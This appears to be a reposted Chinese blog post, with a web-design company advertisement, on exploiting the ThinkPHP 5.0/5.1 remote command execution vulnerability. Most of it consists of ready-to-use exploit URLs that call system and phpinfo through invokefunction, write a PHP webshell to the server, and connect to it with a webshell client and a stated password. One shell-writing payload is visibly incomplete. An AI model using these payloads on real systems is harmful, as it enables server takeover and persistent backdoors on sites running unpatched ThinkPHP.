下面由thinkphp框架教程欄目給大家介紹ThinkPHP 漏洞利用，希望對(duì)需要的朋友有所幫助！

霞浦網(wǎng)站制作公司哪家好，找創(chuàng)新互聯(lián)！從網(wǎng)頁(yè)設(shè)計(jì)、網(wǎng)站建設(shè)、微信開發(fā)、APP開發(fā)、響應(yīng)式網(wǎng)站建設(shè)等網(wǎng)站項(xiàng)目制作，到程序開發(fā)，運(yùn)營(yíng)維護(hù)。創(chuàng)新互聯(lián)于2013年成立到現(xiàn)在10年的時(shí)間，我們擁有了豐富的建站經(jīng)驗(yàn)和運(yùn)維經(jīng)驗(yàn)，來保證我們的工作的順利進(jìn)行。專注于網(wǎng)站建設(shè)就選創(chuàng)新互聯(lián)。

thinkphp_5x_命令執(zhí)行漏洞

受影響版本包括5.0和5.1版本

docker漏洞環(huán)境源碼：
https://github.com/vulnspy/thinkphp-5.1.29
本地環(huán)境搭建：
thinkphp5.0.15+php5.6n+ apache2.0
http://www.thinkphp.cn/donate/download/id/1125.html

利用system函數(shù)遠(yuǎn)程命令執(zhí)行

EXP
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

通過phpinfo函數(shù)寫出phpinfo()信息

EXP：
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

寫入shell

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>shell.php

或者

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK

使用菜刀連接
`
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php 密碼為zane

http://127.0.0.1/middleware/thinkphp_5.0.15_full/test.php 密碼為zane
`
分享題目：關(guān)于ThinkPHP漏洞利用
分享路徑：http://weahome.cn/article/chdjid.html